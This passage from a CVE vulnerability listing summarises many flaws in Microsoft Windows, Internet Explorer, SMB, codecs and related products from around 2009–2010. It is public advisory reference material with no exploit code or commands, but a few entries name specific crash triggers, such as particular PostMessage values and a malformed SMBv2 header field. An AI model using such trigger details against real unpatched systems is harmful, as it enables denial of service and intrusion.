Korean locale is enabled, does not properly allocate memory for transactions, which allows local users to gain privileges via a crafted application, aka "CSRSS Local Elevation of Privilege Vulnerability." [CVE-2010-1890] The kernel in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate ACLs on kernel objects, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Improper Validation Vulnerability." [CVE-2010-1889] Double free vulnerability in the kernel in Microsoft Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2, allows local users to gain privileges via a crafted application, related to object initialization during error handling, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-1888] Race condition in the kernel in Microsoft Windows XP SP3 allows local users to gain privileges via vectors involving thread creation, aka "Windows Kernel Data Initialization Vulnerability." [CVE-2010-1887] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, which allows local users to cause a denial of service (system hang) via a crafted application, aka "Win32k Bounds Checking Vulnerability." [CVE-2010-1886] Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 SP2 and R2, and Windows 7 allow local users to gain privileges by leveraging access to a process with NetworkService credentials, as demonstrated by TAPI Server, SQL Server, and IIS processes, and related to the Windows Service Isolation feature. NOTE: the vendor states that privilege escalation from NetworkService to LocalSystem does not cross a "security boundary." [CVE-2010-1885] The MPC::HexToNum function in helpctr.exe in Microsoft Windows Help and Support Center in Windows XP and Windows Server 2003 does not properly handle malformed escape sequences, which allows remote attackers to bypass the trusted documents whitelist (fromHCP option) and execute arbitrary commands via a crafted hcp:// URL, aka "Help Center URL Validation Vulnerability." [CVE-2010-1883] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted table in an embedded font, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2010-1882] Multiple buffer overflows in the MPEG Layer-3 Audio Codec for Microsoft DirectShow in l3codecx.ax in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allow remote attackers to execute arbitrary code via an MPEG Layer-3 audio stream in (1) a crafted media file or (2) crafted streaming content, aka "MPEG Layer-3 Audio Decoder Buffer Overflow Vulnerability." [CVE-2010-1880] Unspecified vulnerability in Quartz.dll for DirectShow on Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1, and Server 2008 allows remote attackers to execute arbitrary code via a media file with crafted compression data, aka "MJPEG Media Decompression Vulnerability." [CVE-2010-1735] The SfnLOGONNOTIFY function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x4c value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1734] The SfnINSTRING function in win32k.sys in the kernel in Microsoft Windows 2000, XP, and Server 2003 allows local users to cause a denial of service (system crash) via a 0x18d value in the second argument (aka the Msg argument) of a PostMessage function call for the DDEMLEvent window. [CVE-2010-1690] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 does not verify that transaction IDs of responses match transaction IDs of queries, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1689] The DNS implementation in smtpsvc.dll before 6.0.2600.5949 in Microsoft Windows 2000 SP4 and earlier, Windows XP SP3 and earlier, Windows Server 2003 SP2 and earlier, Windows Server 2008 SP2 and earlier, Windows Server 2008 R2, Exchange Server 2003 SP3 and earlier, Exchange Server 2007 SP2 and earlier, and Exchange Server 2010 uses predictable transaction IDs that are formed by incrementing a previous ID by 1, which makes it easier for man-in-the-middle attackers to spoof DNS responses, a different vulnerability than CVE-2010-0024 and CVE-2010-0025. [CVE-2010-1322] The merge_authdata function in kdc_authdata.c in the Key Distribution Center (KDC) in MIT Kerberos 5 (aka krb5) 1.8.x before 1.8.4 does not properly manage an index into an authorization-data list, which allows remote attackers to cause a denial of service (daemon crash), or possibly obtain sensitive information, spoof authorization, or execute arbitrary code, via a TGS request that triggers an uninitialized pointer dereference, as demonstrated by a request from a Windows Active Directory client. [CVE-2010-1264] Unspecified vulnerability in Microsoft Windows SharePoint Services 3.0 SP1 and SP2 allows remote attackers to cause a denial of service (hang) via crafted requests to the Help page that cause repeated restarts of the application pool, aka "Sharepoint Help Page Denial of Service Vulnerability." [CVE-2010-1263] Windows Shell and WordPad in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 [CVE-2010-1255] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 allows local users to execute arbitrary code via vectors related to "glyph outline information" and TrueType fonts, aka "Win32k TrueType Font Parsing Vulnerability." [CVE-2010-1225] The memory-management implementation in the Virtual Machine Monitor (aka VMM or hypervisor) in Microsoft Virtual PC 2007 Gold and SP1, Virtual Server 2005 Gold and R2 SP1, and Windows Virtual PC does not properly restrict access from the guest OS to memory locations in the VMM work area, which allows context-dependent attackers to bypass certain anti-exploitation protection mechanisms on the guest OS via crafted input to a vulnerable application. NOTE: the vendor reportedly found that only systems with an otherwise vulnerable application are affected, because "the memory areas accessible from the guest cannot be leveraged to achieve either remote code execution or elevation of privilege and ... no data from the host is exposed to the guest OS." [CVE-2010-1175] Microsoft Internet Explorer 7.0 on Windows XP and Windows Server 2003 allows remote attackers to have an unspecified impact via a certain XML document that references a crafted web site in the SRC attribute of an image element, related to a "0day Vulnerability." [CVE-2010-1118] Unspecified vulnerability in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, possibly related to a use-after-free issue, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1117] Heap-based buffer overflow in Internet Explorer 8 on Microsoft Windows 7 allows remote attackers to discover the base address of a Windows .dll file, and possibly have unspecified other impact, via unknown vectors, as demonstrated by Peter Vreugdenhil during a Pwn2Own competition at CanSecWest 2010. [CVE-2010-1098] The ANI parser in Microsoft Windows before 7 on the x86 platform, as used in Internet Explorer and other applications, allows remote attackers to cause a denial of service (memory and CPU consumption) via a crafted biClrUsed value in the BITMAPINFO header of a .ANI file. [CVE-2010-1042] Microsoft Windows Media Player 11 does not properly perform colorspace conversion, which allows remote attackers to cause a denial of service (memory corruption) or possibly execute arbitrary code via a crafted .AVI file. NOTE: the provenance of this information is unknown [CVE-2010-0917] Stack-based buffer overflow in VBScript in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, might allow user-assisted remote attackers to execute arbitrary code via a long string in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution when the F1 key is pressed, a different vulnerability than CVE-2010-0483. [CVE-2010-0820] Heap-based buffer overflow in the Local Security Authority Subsystem Service (LSASS), as used in Active Directory in Microsoft Windows Server 2003 SP2 and Windows Server 2008 Gold, SP2, and R2 [CVE-2010-0819] Unspecified vulnerability in the Windows OpenType Compact Font Format (CFF) driver in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users to execute arbitrary code via unknown vectors related to improper validation when copying data from user mode to kernel mode, aka "OpenType CFF Font Driver Memory Corruption Vulnerability." [CVE-2010-0818] The MPEG-4 codec in the Windows Media codecs in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly handle crafted media content with MPEG-4 video encoding, which allows remote attackers to execute arbitrary code via a file in an unspecified "supported format," aka "MPEG-4 Codec Vulnerability." [CVE-2010-0812] Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to bypass intended IPv4 source-address restrictions via a mismatched IPv6 source address in a tunneled ISATAP packet, aka "ISATAP IPv6 Source Address Spoofing Vulnerability." [CVE-2010-0811] Multiple unspecified vulnerabilities in the Microsoft Internet Explorer 8 Developer Tools ActiveX control in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allow remote attackers to execute arbitrary code via unknown vectors that "corrupt the system state," aka "Microsoft Internet Explorer 8 Developer Tools Vulnerability." [CVE-2010-0810] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, does not properly handle unspecified exceptions, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0808] Microsoft Internet Explorer 6 and 7 on Windows XP and Vista does not prevent script from simulating user interaction with the AutoComplete feature, which allows remote attackers to obtain sensitive form information via a crafted web site, aka "AutoComplete Information Disclosure Vulnerability." [CVE-2010-0805] The Tabular Data Control (TDC) ActiveX control in Microsoft Internet Explorer 5.01 SP4, 6 on Windows XP SP2 and SP3, and 6 SP1 allows remote attackers to execute arbitrary code via a long URL (DataURL parameter) that triggers memory corruption in the CTDCCtl::SecurityCHeckDataURL function, aka "Memory Corruption Vulnerability." [CVE-2010-0719] An unspecified API in Microsoft Windows 2000, Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 does not validate arguments, which allows local users to cause a denial of service (system crash) via a crafted application. [CVE-2010-0718] Buffer overflow in Microsoft Windows Media Player 9 and 11.0.5721.5145 allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a crafted .mpg file. [CVE-2010-0487] The Authenticode Signature verification functionality in cabview.dll in Cabinet File Viewer Shell Extension 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows remote attackers to execute arbitrary code via a modified cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "Cabview Corruption Validation Vulnerability." [CVE-2010-0486] The WinVerifyTrust function in Authenticode Signature Verification 5.1, 6.0, and 6.1 in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly use unspecified fields in a file digest, which allows user-assisted remote attackers to execute arbitrary code via a modified (1) Portable Executable (PE) or (2) cabinet (aka .CAB) file that incorrectly appears to have a valid signature, aka "WinVerifyTrust Signature Validation Vulnerability." [CVE-2010-0485] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 Gold and SP2, Windows 7, and Server 2008 R2 "do not properly validate all callback parameters when creating a new window," which allows local users to execute arbitrary code, aka "Win32k Window Creation Vulnerability." [CVE-2010-0484] The Windows kernel-mode drivers in win32k.sys in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 "do not properly validate changes in certain kernel objects," which allows local users to execute arbitrary code via vectors related to Device Contexts (DC) and the GetDCEx function, aka "Win32k Improper Data Validation Vulnerability." [CVE-2010-0483] vbscript.dll in VBScript 5.1, 5.6, 5.7, and 5.8 in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, when Internet Explorer is used, allows user-assisted remote attackers to execute arbitrary code by referencing a (1) local pathname, (2) UNC share pathname, or (3) WebDAV server with a crafted .hlp file in the fourth argument (aka helpfile argument) to the MsgBox function, leading to code execution involving winhlp32.exe when the F1 key is pressed, aka "VBScript Help Keypress Vulnerability." [CVE-2010-0482] The kernel in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate relocation sections of image files, which allows local users to cause a denial of service (reboot) via a crafted file, aka "Windows Kernel Malformed Image Vulnerability." [CVE-2010-0481] The kernel in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly translate a registry key's virtual path to its real path, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Virtual Path Parsing Vulnerability." [CVE-2010-0480] Multiple stack-based buffer overflows in the MPEG Layer-3 audio codecs in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allow remote attackers to execute arbitrary code via a crafted AVI file, aka "MPEG Layer-3 Audio Decoder Stack Overflow Vulnerability." [CVE-2010-0478] Stack-based buffer overflow in nsum.exe in the Windows Media Unicast Service in Media Services for Microsoft Windows 2000 Server SP4 allows remote attackers to execute arbitrary code via crafted packets associated with transport information, aka "Media Services Stack-based Buffer Overflow Vulnerability." [CVE-2010-0477] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly handle (1) SMBv1 and (2) SMBv2 response packets, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted packet that causes the client to read the entirety of the response, and then improperly interact with the Winsock Kernel (WSK), aka "SMB Client Message Size Vulnerability." [CVE-2010-0476] The SMB client in Microsoft Windows Server 2003 SP2, Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted SMB transaction response that uses (1) SMBv1 or (2) SMBv2, aka "SMB Client Response Parsing Vulnerability." [CVE-2010-0379] Multiple unspecified vulnerabilities in the Macromedia Flash ActiveX control in Adobe Flash Player 6, as distributed in Microsoft Windows XP SP2 and SP3, might allow remote attackers to execute arbitrary code via unspecified vectors that are not related to the use-after-free "Movie Unloading Vulnerability" (CVE-2010-0378). NOTE: due to lack of details, it is not clear whether this overlaps any other CVE item. [CVE-2010-0378] Use-after-free vulnerability in Adobe Flash Player 6.0.79, as distributed in Microsoft Windows XP SP2 and SP3, allows remote attackers to execute arbitrary code by unloading a Flash object that is currently being accessed by a script, leading to memory corruption, aka a "Movie Unloading Vulnerability." [CVE-2010-0278] A certain ActiveX control in msgsc.14.0.8089.726.dll in Microsoft Windows Live Messenger 2009 build 14.0.8089.726 on Windows Vista and Windows 7 allows remote attackers to cause a denial of service (msnmsgr.exe crash) by calling the ViewProfile method with a crafted argument during an MSN Messenger session. [CVE-2010-0270] The SMB client in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate fields in SMB transaction responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and reboot) via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Transaction Vulnerability." [CVE-2010-0269] The SMB client in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for SMB responses, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Memory Allocation Vulnerability." [CVE-2010-0268] Unspecified vulnerability in the Windows Media Player ActiveX control in Windows Media Player (WMP) 9 on Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows remote attackers to execute arbitrary code via crafted media content, aka "Media Player Remote Code Execution Vulnerability." [CVE-2010-0265] Buffer overflow in Microsoft Windows Movie Maker 2.1, 2.6, and 6.0, and Microsoft Producer 2003, allows remote attackers to execute arbitrary code via a crafted project (.MSWMM) file, aka "Movie Maker and Producer Buffer Overflow Vulnerability." [CVE-2010-0252] The Microsoft Data Analyzer ActiveX control (aka the Office Excel ActiveX control for Data Analysis) in max3activex.dll in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows remote attackers to execute arbitrary code via a crafted web page that corrupts the "system state," aka "Microsoft Data Analyzer ActiveX Control Vulnerability." [CVE-2010-0250] Heap-based buffer overflow in DirectShow in Microsoft DirectX, as used in the AVI Filter on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2, and in Quartz on Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, allows remote attackers to execute arbitrary code via an AVI file with a crafted length field in an unspecified video stream, which is not properly handled by the RLE video decompressor, aka "DirectShow Heap Overflow Vulnerability." [CVE-2010-0249] Use-after-free vulnerability in Microsoft Internet Explorer 6, 6 SP1, 7, and 8 on Windows 2000 SP4 [CVE-2010-0242] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to cause a denial of service (system hang) via crafted packets with malformed TCP selective acknowledgement (SACK) values, aka "TCP/IP Selective Acknowledgement Vulnerability." [CVE-2010-0241] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Route Information packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Route Information Vulnerability." [CVE-2010-0240] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when a custom network driver is used, does not properly handle local fragmentation of Encapsulating Security Payload (ESP) over UDP packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "Header MDL Fragmentation Vulnerability." [CVE-2010-0239] The TCP/IP implementation in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2, when IPv6 is enabled, does not properly perform bounds checking on ICMPv6 Router Advertisement packets, which allows remote attackers to execute arbitrary code via crafted packets, aka "ICMPv6 Router Advertisement Vulnerability." [CVE-2010-0238] Unspecified vulnerability in registry-key validation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Registry Key Vulnerability." [CVE-2010-0237] The kernel in Microsoft Windows 2000 SP4 and XP SP2 and SP3 allows local users to gain privileges by creating a symbolic link from an untrusted registry hive to a trusted registry hive, aka "Windows Kernel Symbolic Link Creation Vulnerability." [CVE-2010-0236] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not properly allocate memory for the destination key associated with a symbolic-link registry key, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Memory Allocation Vulnerability." [CVE-2010-0235] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Vista Gold does not perform the expected validation before creating a symbolic link, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Symbolic Link Value Vulnerability." [CVE-2010-0234] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not properly validate a registry-key argument to an unspecified system call, which allows local users to cause a denial of service (reboot) via a crafted application, aka "Windows Kernel Null Pointer Vulnerability." [CVE-2010-0233] Double free vulnerability in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows local users to gain privileges via a crafted application, aka "Windows Kernel Double Free Vulnerability." [CVE-2010-0232] The kernel in Microsoft Windows NT 3.1 through Windows 7, including Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, and Windows Server 2008 Gold and SP2, when access to 16-bit applications is enabled on a 32-bit x86 platform, does not properly validate certain BIOS calls, which allows local users to gain privileges by crafting a VDM_TIB data structure in the Thread Environment Block (TEB), and then calling the NtVdmControl function to start the Windows Virtual DOS Machine (aka NTVDM) subsystem, leading to improperly handled exceptions involving the #GP trap handler (nt!KiTrap0D), aka "Windows Kernel Exception Handler Vulnerability." [CVE-2010-0231] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not use a sufficient source of entropy, which allows remote attackers to obtain access to files and other SMB resources via a large number of authentication requests, related to server-generated challenges, certain "duplicate values," and spoofing of an authentication token, aka "SMB NTLM Authentication Lack of Entropy Vulnerability." [CVE-2010-0028] Integer overflow in Microsoft Paint in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted JPEG (.JPG) file, aka "MS Paint Integer Overflow Vulnerability." [CVE-2010-0027] The URL validation functionality in Microsoft Internet Explorer 5.01, 6, 6 SP1, 7 and 8, and the ShellExecute API function in Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2, does not properly process input parameters, which allows remote attackers to execute arbitrary local programs via a crafted URL, aka "URL Validation Vulnerability." [CVE-2010-0026] The Hyper-V server implementation in Microsoft Windows Server 2008 Gold, SP2, and R2 on the x64 platform allows guest OS users to cause a denial of service (host OS hang) via a crafted application that executes a malformed series of machine instructions, aka "Hyper-V Instruction Set Validation Vulnerability." [CVE-2010-0025] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2000 SP3, does not properly allocate memory for SMTP command replies, which allows remote attackers to read fragments of e-mail messages by sending a series of invalid commands and then sending a STARTTLS command, aka "SMTP Memory Allocation Vulnerability." [CVE-2010-0024] The SMTP component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, and Server 2008 Gold, SP2, and R2, and Exchange Server 2003 SP2, does not properly parse MX records, which allows remote DNS servers to cause a denial of service (service outage) via a crafted response to a DNS MX record query, aka "SMTP Server MX Record Vulnerability." [CVE-2010-0023] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Local Privilege Elevation Vulnerability." [CVE-2010-0022] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate the share and servername fields in SMB packets, which allows remote attackers to cause a denial of service (system hang) via a crafted packet, aka "SMB Null Pointer Vulnerability." [CVE-2010-0021] Multiple race conditions in the SMB implementation in the Server service in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allow remote attackers to cause a denial of service (system hang) via a crafted (1) SMBv1 or (2) SMBv2 Negotiate packet, aka "SMB Memory Corruption Vulnerability." [CVE-2010-0020] The SMB implementation in the Server service in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate request fields, which allows remote authenticated users to execute arbitrary code via a malformed request, aka "SMB Pathname Overflow Vulnerability." [CVE-2010-0019] Microsoft Silverlight 3 before 3.0.50611.0 on Windows, and before 3.0.41130.0 on Mac OS X, does not properly handle pointers, which allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and framework outage) via a crafted web site, aka "Microsoft Silverlight Memory Corruption Vulnerability." [CVE-2010-0018] Integer overflow in the Embedded OpenType (EOT) Font Engine (t2embed.dll) in Microsoft Windows 2000 SP4 [CVE-2010-0017] Race condition in the SMB client implementation in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code, and in the SMB client implementation in Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges, via a crafted SMB Negotiate response, aka "SMB Client Race Condition Vulnerability." [CVE-2010-0016] The SMB client implementation in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate response fields, which allows remote SMB servers and man-in-the-middle attackers to execute arbitrary code via a crafted response, aka "SMB Client Pool Corruption Vulnerability." [CVE-2009-4313] ir32_32.dll 3.24.15.3 in the Indeo32 codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (heap corruption) or execute arbitrary code via malformed data in a stream in a media file, as demonstrated by an AVI file. [CVE-2009-4312] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Dave Lenoe of Adobe. [CVE-2009-4311] Unspecified vulnerability in the Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted media content, as reported to Microsoft by Paul Byrne of NGS Software. NOTE: this might overlap CVE-2008-3615. [CVE-2009-4310] Stack-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via crafted compressed video data in an IV41 stream in a media file, leading to many loop iterations, as demonstrated by data in an AVI file. [CVE-2009-4309] Heap-based buffer overflow in the Intel Indeo41 codec for Windows Media Player in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to execute arbitrary code via a large size value in a movi record in an IV41 stream in a media file, as demonstrated by an AVI file. [CVE-2009-4210] The Indeo codec in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted media content. [CVE-2009-3678] Integer overflow in cdd.dll in the Canonical Display Driver (CDD) in Microsoft Windows Server 2008 R2 and Windows 7 on 64-bit platforms, when the Windows Aero theme is installed, allows context-dependent attackers to cause a denial of service (reboot) or possibly execute arbitrary code via a crafted image file that triggers incorrect data parsing after user-mode data is copied to kernel mode, as demonstrated using "Browse with Irfanview" and certain actions on a folder containing a large number of thumbnail images in Resample mode, possibly related to the ATI graphics driver or win32k.sys, aka "Canonical Display Driver Integer Overflow Vulnerability." [CVE-2009-3677] The Internet Authentication Service (IAS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold and SP1, and Server 2008 Gold does not properly verify the credentials in an MS-CHAP v2 Protected Extensible Authentication Protocol (PEAP) authentication request, which allows remote attackers to access network resources via a malformed request, aka "MS-CHAP Authentication Bypass Vulnerability." [CVE-2009-3676] The SMB client in the kernel in Microsoft Windows Server 2008 R2 and Windows 7 allows remote SMB servers and man-in-the-middle attackers to cause a denial of service (infinite loop and system hang) via a (1) SMBv1 or (2) SMBv2 response packet that contains (a) an incorrect length value in a NetBIOS header or (b) an additional length field at the end of this response packet, aka "SMB Client Incomplete Response Vulnerability." [CVE-2009-3675] LSASS.exe in the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 allows remote authenticated users to cause a denial of service (CPU consumption) via a malformed ISAKMP request over IPsec, aka "Local Security Authority Subsystem Service Resource Exhaustion Vulnerability." [CVE-2009-3294] The popen API function in TSRM/tsrm_win32.c in PHP before 5.2.11 and 5.3.x before 5.3.1, when running on certain Windows operating systems, allows context-dependent attackers to cause a denial of service (crash) via a crafted (1) "e" or (2) "er" string in the second argument (aka mode), possibly related to the _fdopen function in the Microsoft C runtime library. NOTE: this might not cross privilege boundaries except in rare cases in which the mode argument is accessible to an attacker outside of an application that uses the popen function. [CVE-2009-3126] Integer overflow in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Office XP SP3, Office 2003 SP3, 2007 Microsoft Office System SP1 and SP2, Office Project 2002 SP1, Visio 2002 SP2, Office Word Viewer, Word Viewer 2003 Gold and SP3, Office Excel Viewer 2003 Gold and SP3, Office Excel Viewer, Office PowerPoint Viewer 2007 Gold, SP1, and SP2, Office Compatibility Pack for Word, Excel, and PowerPoint 2007 File Formats SP1 and SP2, Expression Web, Expression Web 2, Groove 2007 Gold and SP1, Works 8.5, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2 and SP3, Report Viewer 2005 SP1, Report Viewer 2008 Gold and SP1, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a crafted PNG image file, aka "GDI+ PNG Integer Overflow Vulnerability." [CVE-2009-3103] Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location, aka "SMBv2 Negotiation Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2009-3020] win32k.sys in Microsoft Windows Server 2003 SP2 allows remote attackers to cause a denial of service (system crash) by referencing a crafted .eot file in the src descriptor of an @font-face Cascading Style Sheets (CSS) rule in an HTML document, possibly related to the Embedded OpenType (EOT) Font Engine, a different vulnerability than CVE-2006-0010, CVE-2009-0231, and CVE-2009-0232. NOTE: some of these details are obtained from third party information. [CVE-2009-3019] Microsoft Internet Explorer 6 on Windows XP SP2 and SP3, and Internet 